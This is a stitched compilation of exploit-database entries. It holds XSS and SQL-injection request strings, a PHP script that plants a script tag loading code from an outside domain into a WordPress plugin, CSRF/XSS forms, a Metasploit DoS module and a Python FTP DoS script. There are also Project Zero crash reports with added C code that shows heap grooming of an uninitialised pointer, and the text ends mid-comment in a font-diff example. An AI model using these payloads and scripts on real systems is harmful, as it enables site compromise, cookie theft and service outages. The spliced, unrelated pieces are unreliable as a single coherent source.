-
GET /main.php?page=Users&subPage=UserContainer&subsection=view&id=240689'%3balert(1)%2f%2f205 HTTP/1.1
-
GET /main.php?section=UserContainer&subsection=edit&id=6&name=Testingus4e8b7f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eadfb7 HTTP/1.1
-
GET /main.php?section=UserContainer&subsection=edit7bef8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea9095&id=6&name=Testingus4 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add270d4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c1acb1f950&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28a3345"><img%20src%3da%20onload%3dalert(1)>2d6845d9556&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3a00%3a006795f"><img%20src%3da%20onload%3dalert(1)>c92fbc98475&txtToDate=2015-07-28&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28c0570"><img%20src%3da%20onload%3dalert(1)>77b8cd697e9&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28&txtToTime=23%3a59%3a592b983"><img%20src%3da%20onload%3dalert(1)>0d9cc3967ae&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane26cca6"><img%20src%3da%20onload%3dalert(1)>84e475837bc&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6b50fa%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed94954ba0d3&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
Source: https://code.google.com/p/google-security-research/issues/detail?id=424&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86.
The crash is caused by a 1 bit delta from the original file at offset 0x31B. OffViz identified this offset as WordBinaryDocuments[1].WordBinaryDocument[0].WordFIB.FIBTable97.fcPlcfFldMom with an original value of 0x000072C6 and a fuzzed value of 0x00007AC6.
Attached files:
Fuzzed minimized PoC: 2509821532_min.doc
Fuzzed non-minimized PoC: 2509821532_crash.doc
Original non-fuzzed file: 2509821532_orig.doc
DLL Versions:
wwlib.dll: 12.0.6720.5000
msptls.dll: 12.0.6682.5000
Observed Crash:
eax=00000008 ebx=037bbec4 ecx=0f67df76 edx=c0c0c106 esi=00000000 edi=0012caec
eip=3124d7d4 esp=0012c9d8 ebp=0012c9e0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
3124d7ca 8b4d0c mov ecx,dword ptr [ebp+0Ch]
3124d7cd 8b5508 mov edx,dword ptr [ebp+8]
3124d7d0 56 push esi
3124d7d1 57 push edi
3124d7d2 7214 jb wwlib!FMain+0x9231 (3124d7e8)
=> 3124d7d4 8b32 mov esi,dword ptr [edx] ds:0023:c0c0c106=????????
3124d7d6 3b31 cmp esi,dword ptr [ecx]
0:000> kb L8
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012c9e0 3165adbb c0c0c106 0f67df76 00000008 wwlib!FMain+0x921d
0012c9f4 6bdd19f7 3211e7e0 c0c0c0c0 0f67df30 wwlib!DllGetLCID+0x1e64e5
0012caa8 6bdd24c8 0000000f 0012cd90 00127965 MSPTLS!LssbFIsSublineEmpty+0x1f3f
0012cb28 6bddf8e0 00000000 0012cd90 00000000 MSPTLS!LssbFIsSublineEmpty+0x2a10
0012cb8c 6bddff5d 037bbec0 00000000 0012cdb4 MSPTLS!LssbFIsSublineEmpty+0xfe28
0012cbbc 6bddf1ef 00000000 00000000 0ee10fa0 MSPTLS!LssbFIsSublineEmpty+0x104a5
0012cdc0 6bdc4b85 0304a320 00000bc1 00116333 MSPTLS!LssbFIsSublineEmpty+0xf737
0012cdf4 312dbeea 0304a320 00000bc1 00116333 MSPTLS!LsCreateLine+0x23
The value in edx is an application verifier canary value for uninitialized heap data. Looking back up the call stack we can see the instruction that pushed this value:
6bdd19de 8d45d0 lea eax,[ebp-30h]
6bdd19e1 50 push eax
6bdd19e2 ff7704 push dword ptr [edi+4]
6bdd19e5 8b45f8 mov eax,dword ptr [ebp-8]
=> 6bdd19e8 ff704c push dword ptr [eax+4Ch]
6bdd19eb 8b45fc mov eax,dword ptr [ebp-4]
6bdd19ee ff7004 push dword ptr [eax+4]
6bdd19f1 ff908c000000 call dword ptr [eax+8Ch] ds:0023:025ac3ac=3165ada3
6bdd19f7 3bc6 cmp eax,esi
Examining memory at [ebp-8] we see:
0:000> dds poi(ebp-8)-4
11c22cb4 11c22d2c # pointer to next heap chunk
11c22cb8 4e44534c # tag NDSL (eax points here)
11c22cbc 11c22d30 # flink?
11c22cc0 11c22c40 # blink?
11c22cc4 00000aea
11c22cc8 00000aea
11c22ccc 02642ec4
11c22cd0 00000000
11c22cd4 00000000
11c22cd8 00000aea
11c22cdc 00000000
11c22ce0 00000aea
11c22ce4 00000000
11c22ce8 00000000
11c22cec c0c0c0c0
11c22cf0 c0c0000d
11c22cf4 00001800
11c22cf8 00000000
11c22cfc 00001800
11c22d00 00000000
11c22d04 c0c0c0c0 # pushed value (eax+4ch) uninitialized
11c22d08 c0c0c0c0
11c22d0c c0c0c0c0
11c22d10 c0c0c0c0
11c22d14 c0c0c0c0
11c22d18 c0c0c0c0
11c22d1c c0c0c0c0
11c22d20 c0c0c0c0
11c22d24 c0c0c0c0
11c22d28 c0c0c0c0
11c22d2c 11c22da4 # start of next heap chunk
11c22d30 4e44534c
An attacker may control the uninitialized value by first allocating a heap chunk of the same size so that it lands in the same spot as the chunk above, writing data at offset +4Ch, and then freeing the chunk back to the allocator. The attacker then controls the pointer at eax+4Ch when it is used during . If it points to a valid page it will survive the dereferences on the crashing path. There did not appear to be an immediate path to an out-of-bounds memory write; however, it is likely that this attacker-controlled pointer will need to be freed later in execution.
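The grooming sequence described in that paragraph, as an added example that is not part of the Project Zero report: a hypothetical 0x74-byte object with a pointer field at +0x4c (the layout is an assumption mirroring the dump above), a consumer that reads the field without initialising it, and an attacker step that plants a pointer in a same-size chunk and frees it. It assumes a glibc-style allocator that hands a just-freed chunk straight back to the next same-size request without scrubbing the body (no sanitizer quarantine, no MALLOC_PERTURB_). Application Verifier's 0xc0c0c0c0 fill is what made the stale field visible in the crash above; in a release build the field simply carries the previous tenant's bytes, which is what the grooming exploits.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical layout mirroring the advisory's dump: a 0x74-byte object whose
 * pointer field at +0x4c is consumed before anything initialises it. */
#define OBJ_SIZE 0x74
#define PTR_OFF  0x4c

struct victim { unsigned char raw[OBJ_SIZE]; };

static void *read_field(const struct victim *v)
{
    void *p;
    memcpy(&p, v->raw + PTR_OFF, sizeof p);
    return p;
}

/* The buggy consumer: allocates the object and immediately uses +0x4c.
 * Nothing initialises the field, so it holds whatever the chunk held before. */
static struct victim *consumer_alloc(void **field_out)
{
    struct victim *v = malloc(sizeof *v);
    if (!v) return NULL;
    /* deliberately no memset(v, 0, sizeof *v): this is the bug */
    *field_out = read_field(v);
    return v;
}

/* Attacker step: take a same-size chunk, plant a pointer at +0x4c, give it back.
 * The allocator puts the chunk at the head of its free list with the body intact
 * (glibc's tcache only overwrites the first 16 bytes), so the next same-size
 * malloc() returns it with the planted value still at +0x4c. */
static int groom(void *planted)
{
    struct victim *g = malloc(sizeof *g);
    if (!g) return 0;
    memset(g, 0, sizeof *g);
    memcpy(g->raw + PTR_OFF, &planted, sizeof planted);
    free(g);
    return 1;
}

/* Returns 1 if the consumer observed the attacker's planted pointer, 0 otherwise. */
int uninit_reuse_demo(void)
{
    static int target;               /* stands in for "a valid page" the attacker picks */
    void *planted = &target, *seen = NULL;
    if (!groom(planted)) return 0;
    struct victim *v = consumer_alloc(&seen);
    int controlled = (v != NULL) && (seen == planted);
    free(v);
    return controlled;
}

/* Control: with zero-initialisation the grooming has nothing to reuse.
 * Returns 1 if the field reads as NULL despite the same grooming. */
int fixed_consumer_demo(void)
{
    static int target;
    void *planted = &target;
    if (!groom(planted)) return 0;
    struct victim *v = calloc(1, sizeof *v);   /* zeroed: stale +0x4c is gone */
    if (!v) return 0;
    void *seen = read_field(v);
    free(v);
    return seen == NULL;
}

int main(void)
{
    printf("uninitialised field controlled by groom: %d\n", uninit_reuse_demo());
    printf("zero-initialised field controlled:       %d\n", fixed_consumer_demo());
    return 0;
}
```

The second function is the fix the consumer needs: either calloc, or a memset at allocation time before any field is trusted. The size class matters more than the exact address; any allocation that is routed to the same bin as the freed chunk will pick up the stale body.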
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37909.zip
source: https://www.securityfocus.com/bid/55749/info
The Akismet plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
#!/usr/bin/php -f
<?php
#
# legacy.php curl exploit
#
// HTTP POST the reflected payload to akismet/legacy.php on the target host
if ($argc < 2) {
    fwrite(STDERR, "usage: {$argv[0]} <host>\n");
    exit(1);
}
$target = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://$target/wp-content/plugins/akismet/legacy.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
// double URL-encoded: "><script src=//santanafest.com.br/enquete/c></script>
curl_setopt($ch, CURLOPT_POSTFIELDS, "s=%2522%253E%253Cscript%2520src%253d%2F%2Fsantanafest.com.br%2Fenquete%2Fc%253E%253C%2Fscript%253E");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
source: https://www.securityfocus.com/bid/55755/info
Zenphoto is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Zenphoto 1.4.3.2 is vulnerable; prior versions may also be affected.
http://www.example.com/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C>
source: https://www.securityfocus.com/bid/55760/info
Omnistar Mailer is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, and steal cookie-based authentication credentials; other attacks are also possible.
Omnistar Mailer 7.2 is vulnerable; other versions may also be affected.
http://www.example.com/mailertest/admin/responder.php?op=edit&id=-37'+Union+Select+version(),2,3--%20-#[SQLi]
http://www.example.com/mailer/admin/preview.php?id=-2'+union+Select+1--%20-[SQLi]
http://www.example.com/mailer/admin/pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-&op=list[SQLi]
http://www.example.com/mailer/admin/navlinks.php?op=edit&nav_id=9''+Union+Select+version(),2,3--%20-#[SQLi]
http://www.example.com/mailertest/users/register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-[SQLi]
http://www.example.com/mailertest/admin/pages.php?op=edit&id=16&form_id=2'[SQLi]
http://www.example.com/mailertest/admin/contacts.php?op=edit&id=3&form_id=2'[SQLi]
http://www.example.com/mailertest/users/index.php?profile=1&form_id=2'[SQLi]
http://www.example.com/mailertest/users/register.php?form_id=2'[SQLi]
source: https://www.securityfocus.com/bid/55761/info
PowerTCP WebServer for ActiveX is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the application (typically Internet Explorer), denying service to legitimate users.
PowerTCP WebServer for ActiveX 1.9.2 is vulnerable; other versions may also be affected.
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dart Webserver <= 1.9.0 Stack Overflow',
      'Description'    => %q{
        Dart Webserver from Dart Communications throws a stack overflow
        exception when processing large requests.
      },
      'Author'         => [ 'catatonicprime' ],
      'Version'        => '$Revision: 15513 $',
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'CVE', '2012-3819' ],
      ],
      'DisclosureDate' => '9/28/2012'))

    register_options([
      Opt::RPORT(80),
      OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust', 520000 ])
    ])
  end

  def run
    server = datastore['RHOST']
    if datastore['RPORT'].to_i != 80
      server += ":" + datastore['RPORT'].to_s
    end
    size = datastore['SIZE']
    print_status("Crashing the server at #{server} ...")
    # One oversized request line; the server exhausts its stack parsing it.
    request = "A" * size + "\r\n\r\n"
    connect
    sock.put(request)
    disconnect
  end
end
[+] Exploit Title : Wordpress Googmonify Plug-in XSS/CSRF
[+] Exploit Author : Ehsan Hosseini
[+] Date: 2015-08-21
[+] Vendor Homepage : https://wordpress.org/plugins/googmonify/
[+] Software Link : https://downloads.wordpress.org/plugin/googmonify.zip
[+] Version : 0.8.1
[+] Tested On : Windows FireFox
[+] CVE : N/A
===============================
Vulnerable Code : googmonify.php - Line 190,194,208
<input id="PID" name="PID" type="text" value="<?php echo $pid; ?>">
<input id= "Limit" name="Limit" type="text" value="<?php echo $limit; ?>" size="5">
<input id="AID" name="AID" type="text" value="<?php echo $aid; ?>">
===============================
Exploit 1 (Just CSRF):
<form method="POST"
action="http://[URL]/[Path]/wp-admin/options-general.php?page=googmonify.php">
<input name="PID" type="hidden" value='Ehsan Hosseini'>
<input name="Limit" type="hidden" value="0">
<input name="Analytics" type="hidden" value="0" >
<input name="AID" type="hidden" value="Ehsan Hosseini">
<input name="GoogmonifyUpdate" type="submit" value="Update Options »">
</form>
Exploit 2 (CSRF & XSS):
<form method="POST"
action="http://[URL]/[Path]/wp-admin/options-general.php?page=googmonify.php">
<input name="PID" type="hidden"
value='"><script>alert(document.cookie)</script>'>
<input name="Limit" type="hidden" value="0">
<input name="Analytics" type="hidden" value="0" >
<input name="AID" type="hidden" value='"><script>alert(/Ehsan Hosseini/)</script>'>
<input name="GoogmonifyUpdate" type="submit" value="Update Options »">
</form>
===============================
Patch : googmonify.php - Line 190,194,208
<input id="PID" name="PID" type="text" value="<?php echo htmlspecialchars($pid); ?>">
<input id= "Limit" name="Limit" type="text" value="<?php echo htmlspecialchars($limit); ?>" size="5">
<input id="AID" name="AID" type="text" value="<?php echo htmlspecialchars($aid); ?>">
===============================
Discovered By : Ehsan Hosseini.
# Exploit Title: WordPress MDC Private Message Persistent XSS
# Date: 8/20/15
# Exploit Author: Chris Kellum
# Vendor Homepage: http://medhabi.com/
# https://wordpress.org/plugins/mdc-private-message/
# Version: 1.0.0
=====================
Vulnerability Details
=====================
The 'message' field doesn't sanitize input, allowing a less privileged user (Editor, Author, etc.)
to execute an XSS attack against an Administrator.
Proof of Concept:
Place <script>alert('Hello!')</script> in the message field of a private message and then submit.
Open the message and the alert window will fire.
===================
Disclosure Timeline
===================
8/16/15 - Vendor notified.
8/19/15 - Version 1.0.1 released.
8/20/15 - Public Disclosure.
#!/usr/bin/python
# Exploit Title: Konica Minolta FTP Utility 1.0 Remote DoS PoC
# Date: 21-08-2015
# Exploit Author: Shankar Damodaran
# Vendor Homepage: http://www.konicaminolta.com/
# Software Link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Version: 1.0
# Tested on: Microsoft Windows XP Professional SP3 English
import socket

# The IP address of the remote host
ftphost = '192.168.1.7'
# The port of the remote host
ftpport = 21

# Oversized argument for the USER command. Once the server receives it, it stops
# answering other, legitimate clients for as long as this connection is open.
crafted_user_name = "B" * 450012  # DoS

# Establishing connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ftphost, ftpport))
s.recv(1024)  # read the banner

# Sending the evil input (sendall, so the whole 450 KB line actually goes out).
s.sendall(('USER ' + crafted_user_name + '\r\n').encode())

# Once the line has been sent the remote FTP server is unresponsive. Interrupting
# the client (Ctrl+C) closes the connection and the server resumes; it does not crash.
s.sendall(b'QUIT\r\n')
s.close()
# End of PoC - Shankar Damodaran
Source: https://code.google.com/p/google-security-research/issues/detail?id=401&can=1
We have encountered a Windows kernel crash in the win32k!fsc_RemoveDups function while processing corrupted TTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff6e7000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91e809df, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
Could not read faulting driver name
READ_ADDRESS: GetPointerFromAddress: unable to read from 8277c84c
Unable to read MiSystemVaType memory at 8275bf00
ff6e7000
FAULTING_IP:
win32k!fsc_RemoveDups+85
91e809df 3918 cmp dword ptr [eax],ebx
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 91e8015c to 91e809df
STACK_TEXT:
969e3624 91e8015c 969e3858 fbff0e78 0000002b win32k!fsc_RemoveDups+0x85
969e36cc 91e89979 ff6de010 ff6de07c 00000001 win32k!fs_FindBitMapSize+0x2de
969e36e8 91e89b59 fbff0e78 0000002b 00000001 win32k!bGetGlyphMetrics+0x39
969e382c 91e7ec63 fbff0e78 0000002b 969e3918 win32k!lGetGlyphBitmap+0x2b
969e3850 91e7eab6 00000000 00000001 0000002b win32k!ttfdQueryFontData+0x158
969e38a0 91e7dce2 ff7af010 fbe0ccf0 00000001 win32k!ttfdSemQueryFontData+0x45
969e38e8 91e83774 ff7af010 fbe0ccf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
969e3960 91efbc8d 969e3c3c fbe2cc94 ff713154 win32k!xInsertMetricsPlusRFONTOBJ+0x120
969e3990 91e7594d 0000000a ff7bf000 969e3cd0 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
969e39c8 91efb78b 969e3c1c 969e3c3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
969e3a0c 91e755d0 969e3cd0 0000000a 969e3c1c win32k!ESTROBJ::vInit+0x268
969e3c2c 91e75793 00000000 969e3cd0 fbe0ccf0 win32k!GreGetTextExtentExW+0x12a
969e3d0c 8264f896 0701015e 02bb0bac 0000000a win32k!NtGdiGetTextExtentExW+0x141
969e3d0c 779670f4 0701015e 02bb0bac 0000000a nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0015f434 00000000 00000000 00000000 00000000 0x779670f4
---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "glyf" table.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in win32k!fsc_RemoveDups or another location in kernel space. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is a proof of concept font file together with the corresponding kernel crash log.
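Both Project Zero reports above reduce to the same triage step: diff the fuzzed file against the original and map each changed byte to the structure that owns it (OffViz did that for the Word FIB field at offset 0x31B; here the mutations were pinpointed to the glyf table). The following is an added example, not code from either report, that does the mapping for the sfnt table directory in C: it builds a constructed two-table font, flips one bit inside glyf, and attributes the change. The sample font, its table sizes and the helper names are assumptions; the directory layout it parses (sfnt version, numTables, then 16-byte records of tag, checksum, offset and length) is the real TrueType container format, and the bounds checks are the ones a parser needs before trusting a fuzzed directory.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Big-endian field helpers for the sfnt (TrueType/OpenType) container. */
static uint32_t rd32(const uint8_t *p) { return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3]; }
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(((uint16_t)p[0] << 8) | p[1]); }
static void wr32(uint8_t *p, uint32_t v) { p[0] = v >> 24; p[1] = v >> 16; p[2] = v >> 8; p[3] = v; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = v >> 8; p[1] = v; }

/* Resolve a file offset to the table that owns it.  On success the 4-byte tag is
 * copied to tag_out and the offset within that table is returned.  Returns -1 when
 * the offset lies in the table directory or in inter-table padding, and -2 when the
 * directory is malformed (bad version, truncated, or a record pointing past EOF). */
long sfnt_owner(const uint8_t *font, size_t len, size_t off, char tag_out[5])
{
    if (len < 12 || off >= len) return -2;
    uint32_t version = rd32(font);
    if (version != 0x00010000 && version != 0x74727565 /* 'true' */) return -2;
    uint16_t n = rd16(font + 4);
    if (12 + 16 * (size_t)n > len) return -2;              /* truncated directory */
    for (uint16_t i = 0; i < n; i++) {
        const uint8_t *rec = font + 12 + 16 * i;          /* tag, checksum, offset, length */
        uint32_t toff = rd32(rec + 8), tlen = rd32(rec + 12);
        if (toff > len || tlen > len - toff) return -2;    /* overflow-safe bounds check */
        if (off >= toff && off < toff + tlen) {
            memcpy(tag_out, rec, 4);
            tag_out[4] = '\0';
            return (long)(off - toff);
        }
    }
    return -1;
}

/* Count the bytes that differ between an original font and a same-length fuzzed copy
 * and fall inside table `tag`.  Returns -1 if the original's directory is malformed. */
long mutations_in_table(const uint8_t *orig, const uint8_t *fuzz, size_t len, const char *tag)
{
    long hits = 0;
    char owner[5];
    for (size_t i = 0; i < len; i++) {
        if (orig[i] == fuzz[i]) continue;
        long r = sfnt_owner(orig, len, i, owner);
        if (r == -2) return -1;
        if (r >= 0 && strcmp(owner, tag) == 0) hits++;
    }
    return hits;
}

/* Pack tables into a minimal sfnt for testing.  Checksums, searchRange, entrySelector
 * and rangeShift stay zero: enough for offset bookkeeping, not a loadable font.
 * Returns the number of bytes written, or 0 if `cap` is too small. */
size_t build_sfnt(uint8_t *out, size_t cap, int n, const char *tags[], const uint8_t *bodies[], const size_t lens[])
{
    size_t dir = 12 + 16 * (size_t)n, pos = dir;
    if (cap < dir) return 0;
    memset(out, 0, cap);
    wr32(out, 0x00010000);
    wr16(out + 4, (uint16_t)n);
    for (int i = 0; i < n; i++) {
        size_t padded = (lens[i] + 3) & ~(size_t)3;        /* tables are 4-byte aligned */
        if (padded > cap - pos) return 0;
        uint8_t *rec = out + 12 + 16 * i;
        memcpy(rec, tags[i], 4);
        wr32(rec + 8, (uint32_t)pos);
        wr32(rec + 12, (uint32_t)lens[i]);
        memcpy(out + pos, bodies[i], lens[i]);
        pos += padded;
    }
    return pos;
}

/* Constructed sample: a two-table font ('head', 'glyf') and a copy with a single bit
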